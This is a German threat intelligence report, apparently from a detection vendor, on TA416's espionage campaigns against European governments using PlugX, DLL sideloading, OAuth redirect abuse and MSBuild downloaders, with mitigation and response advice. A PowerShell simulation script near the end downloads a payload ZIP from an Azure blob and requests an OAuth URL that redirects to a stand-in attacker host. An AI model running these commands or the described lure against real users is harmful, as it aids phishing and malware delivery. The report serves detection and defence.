Ich würde wieder zur EU zurückkehren: TA416 nimmt europäische Regierungsausspionage-Kampagnen wieder auf

Ruslan Mikhalov Leiter der Bedrohungsforschung bei SOC Prime

Folgen

Ich würde wieder zur EU zurückkehren: TA416 nimmt europäische Regierungsausspionage-Kampagnen wieder auf

Detection stack

AIDR
Alert
ETL
Query

Bedrohungsbericht
Angriffsablauf
Erkennungen
Simulationen

Zusammenfassung

TA416, ein mit China verbundener Bedrohungsakteur, hat Mitte 2025 nach einer Phase reduzierter Aktivität erneut begonnen, europäische Regierungs- und diplomatische Einrichtungen ins Visier zu nehmen. Der Akteur kombiniert leichte Web-Bug-Aufklärung mit der Bereitstellung einer maßgeschneiderten PlugX-Hintertür und rotiert anfängliche Zugriffsmechanismen, die gefälschte Cloudflare-Turnstile-Lures, Missbrauch von OAuth-Umleitungen und MSBuild-gesteuerte Downloader umfassen. Bis März 2026 zeigen Berichte, dass das gleiche Vorgehen auf diplomatische Ziele im Nahen Osten ausgeweitet wurde, da sich die regionalen Spannungen mit Iran verschärften. Die Kampagnen stützen sich auf kompromittierte Postfächer, signierte Windows-Binärdateien für DLL-Sideloading und schnell wechselnde Command-and-Control-Infrastruktur.

Untersuchung

Proofpoint verfolgte mehrere Spear-Phishing-Wellen, die von Freemail-Adressen und kompromittierten Regierungsaccounts gesendet wurden, unter Verwendung von Tracking-Pixels oder präparierten Archiven. Die auf Archiven basierenden Ketten setzten ZIP-Schmuggel mit LNK-Artefakten ein, um MSIs oder TAR-Pakete bereitzustellen, die dann signierte ausführbare Dateien starteten, um PlugX zu sideloaden. Gleichzeitig missbrauchte TA416 Microsoft Entra ID OAuth-Umleitungen und verwendete umbenannte MSBuild-Binärdateien in Verbindung mit bösartigen C#-Projektdateien, um Payloads abzurufen und auszuführen. C2-Verkehr wurde über HTTP mit RC4-verschlüsselten Nachrichten beobachtet und charakteristische Header/Cookie-Muster geformt, um Anfragen und Antworten zu gestalten.

Abschwächung

Erzwingen Sie starke E-Mail-Authentifizierung und verschärfen Sie die Kontrollen für eingehende Inhalte aus unbekannten Cloud-Speicheranbietern. Überwachen Sie verdächtige Ausführungen von signierten Binärdateien, die häufig für Sideloading missbraucht werden (zum Beispiel cnmpaui.exe und steam_monitor.exe), und alarmieren Sie bei abnormalem DLL-Suchverhalten. Fügen Sie Erkennungen für ungewöhnliche HTTP-Header- oder Cookie-Signaturen im Zusammenhang mit verschlüsseltem C2 hinzu und blockieren Sie bekannte TA416-Domains/IPs, wo dies möglich ist. Stärken Sie die Endpunktüberwachung für neu erstellte Run-Key-Persistenz und unerwartete Datei-Schreibvorgänge in öffentliche oder freigegebene Verzeichnisse.

Reaktion

Wenn Aktivität erkannt wird, isolieren Sie den Host, erfassen Sie flüchtigen Speicher und bewahren Sie relevante Endpunkt- und Mail-Logs für die Untersuchung auf. Suchen Sie nach PlugX-Artefakten, einschließlich des CNCLID.dll-Loaders, Canon.dat-Shellcode und des dGcEuQhKT-Mutex. Widerrufen Sie den Zugang für kompromittierte E-Mail-Konten, setzen Sie Anmeldeinformationen zurück und entfernen Sie geplante Aufgaben oder andere Persistenzmechanismen. Analysieren Sie die Netzwerk-Telemetrie auf RC4-verschlüsseltes HTTP-Beaconing, blockieren Sie dann die zugehörigen Domains/URLs und erweitern Sie die Jagd im gesamten Umfeld.

"graph TB %% Class Definitions Section classDef action fill:#ffcccc classDef tool fill:#ccccff classDef malware fill:#ffcc99 classDef process fill:#ccffcc %% Nodes action_initial_access["Action – T1566 Phishing: Phishing-E-Mails gesendet von kompromittierten Accounts und allgemeinem Phishing. Empfänger klicken auf bösartige Links."] class action_initial_access action tool_phishing_email["Tool – Name: Phishing-E-Mail Technik: T1566"] class tool_phishing_email tool action_user_execution["Action – T1204 Benutzer-Ausführung: Opfer klicken auf bösartige URL, die zu einem bösartigen ZIP-Download führt."] class action_user_execution action tool_malicious_zip["Tool – Name: Bösartiges ZIP-Archiv, das LNK-Verknüpfung enthält"] class tool_malicious_zip tool action_lnk_smuggling["Action – T1027.012 LNK-Icon-Schmuggel: LNK-Verknüpfung führt PowerShell-Skript aus."] class action_lnk_smuggling action process_powershell["Prozess – PowerShell-Ausführung zur Extraktion signierter Binärdateien"] class process_powershell process tool_signed_binary["Tool – Name: cnmpaui.exe (signierte legitime Binärdatei)"] class tool_signed_binary tool action_dll_sideloading["Action – T1218 Systembinär-Proxy-Ausführung: DLL-Sideloading lädt bösartige DLL."] class action_dll_sideloading action malware_malicious_dll["Malware – Bösartige DLL, die via Sideloading geladen wird"] class malware_malicious_dll malware action_msbuild_execution["Action – T1127.001 Vertrauenswürdige Entwicklerdienstprogramme Proxy-Ausführung: MSBuild verwendet, um PlugX herunterzuladen und auszuführen."] class action_msbuild_execution action tool_msbuild["Tool – Name: Umbenannte MSBuild-Ausführbare"] class tool_msbuild tool tool_csharp_project["Tool – Name: Bösartige C#-Projektdatei"] class tool_csharp_project tool malware_plugx["Malware – PlugX-Payload"] class malware_plugx malware action_persistence["Action – T1037.001 Persistenz via Run-Registry-Schlüssel und Verknüpfungsmodifikation."] class action_persistence action process_registry["Prozess – Erstellung eines Run-Registry-Schlüssels unter HKCUSoftwareMicrosoftWindowsCurrentVersionRun"] class process_registry process action_defense_evasion["Action – T1553.002 Vertrauenssteuerung unterwandern: Missbrauch signierter Ausführbarer und starke Obfuskation."] class action_defense_evasion action action_apddomain_hijack["Action – T1574.014 Entführungs-Ausführungs-Fluss: AppDomainManager-Entführung via MSBuild-Kette"] class action_apddomain_hijack action action_c2["Action – T1071.001 Webprotokolle und T1573.001 Verschlüsselter Kanal: HTTP-C2 mit RC4-Verschlüsselung"] class action_c2 action process_c2_communication["Prozess – Verschlüsselte HTTP-Kommunikation mit C2-Server"] class process_c2_communication process action_exfiltration["Action – T1041 Exfiltration über C2-Kanal: Daten über verschlüsselten Kanal gesendet"] class action_exfiltration action %% Connections action_initial_access –>|liefert| tool_phishing_email tool_phishing_email –>|enthält Link zu| action_user_execution action_user_execution –>|lädt herunter| tool_malicious_zip tool_malicious_zip –>|enthält| action_lnk_smuggling action_lnk_smuggling –>|führt aus| process_powershell process_powershell –>|extrahiert| tool_signed_binary tool_signed_binary –>|lädt| action_dll_sideloading action_dll_sideloading –>|lädt| malware_malicious_dll malware_malicious_dll –>|bereitet Umgebung vor für| action_msbuild_execution action_msbuild_execution –>|verwendet| tool_msbuild tool_msbuild –>|verarbeitet| tool_csharp_project tool_csharp_project –>|lädt herunter und führt aus| malware_plugx malware_plugx –>|erstellt| action_persistence action_persistence –>|schreibt| process_registry action_persistence –>|modifiziert Verknüpfung für| action_lnk_smuggling action_persistence –>|ermöglicht| action_defense_evasion action_defense_evasion –>|wendet an| action_apddomain_hijack action_apddomain_hijack –>|ermöglicht| action_c2 action_c2 –>|kommuniziert via| process_c2_communication process_c2_communication –>|exfiltriert Daten via| action_exfiltration "

Angriffsablauf

Angriffserzählungen & Befehle:
1. Payload bereitstellen: Der Angreifer lädt eine bösartige ZIP-Datei (payload.zip) in den Azure Blob-Container hoch mydownload.z29.web.core.windows.net.
2. Lockseite erstellen: Eine bösartige HTML-Seite, die auf der gleichen Domain gehostet wird, enthält ein <img> Tag, das auf die Azure Blob-URL verweist (was den Download auslöst) and ein verstecktes <iframe> das sofort das Opfer zu einem Microsoft Entra ID OAuth 2.0-Autorisierungs-Endpunkt weiterleitet mit einem redirect_uri das auf die vom Angreifer kontrollierte Domain zeigt.
3. Opfer-Interaktion: Das Opfer besucht die Lockseite (z.B. via Phishing-E-Mail). Der Browser sendet zwei HTTP-GET-Anfragen in schneller Folge – eine für die Blob-URL und eine für die OAuth-URL. Azure Activity Logs registrieren beide Anfragen unter der gleichen Proxy-Sitzung, was die Bedingung der Regel selection_blob UND selection_oauth erfüllt.

Regressions-Testskript: (von der Opfermaschine ausgeführt, um die Telemetrie zu reproduzieren)

# TA416 Azure Blob + OAuth Auslösersimulation
# Schritt 1: Bösartiges Blob herunterladen (simuliert mit einer harmlosen Datei)
Invoke-WebRequest -Uri "https://mydownload.z29.web.core.windows.net/payload.zip" -OutFile "$env:TEMPpayload.zip"

# Schritt 2: Unmittelbar die OAuth-Autorisierungs-URL aufrufen (simulierte Umleitung)
$oauthUrl = "https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=FAKE_CLIENT_ID&response_type=code&redirect_uri=https://attacker.example.com/callback"
Invoke-WebRequest -Uri $oauthUrl -Method GET -UseBasicParsing | Out-Null

Write-Host "Simulation abgeschlossen – beide URLs angefordert."

Aufräum-Befehle:

# Entfernen Sie die heruntergeladene Datei
Remove-Item -Path "$env:TEMPpayload.zip" -Force -ErrorAction SilentlyContinue

# Löschen Sie PowerShell-Sitzungsvariablen
Remove-Variable -Name oauthUrl -ErrorAction SilentlyContinue

Treten Sie der Detection as Code-Plattform von SOC Prime bei um die Sichtbarkeit der für Ihr Unternehmen relevantesten Bedrohungen zu verbessern. Um Ihnen den Einstieg zu erleichtern und unmittelbaren Mehrwert zu erzielen, buchen Sie jetzt ein Treffen mit den Experten von SOC Prime.

Kostenlos beitreten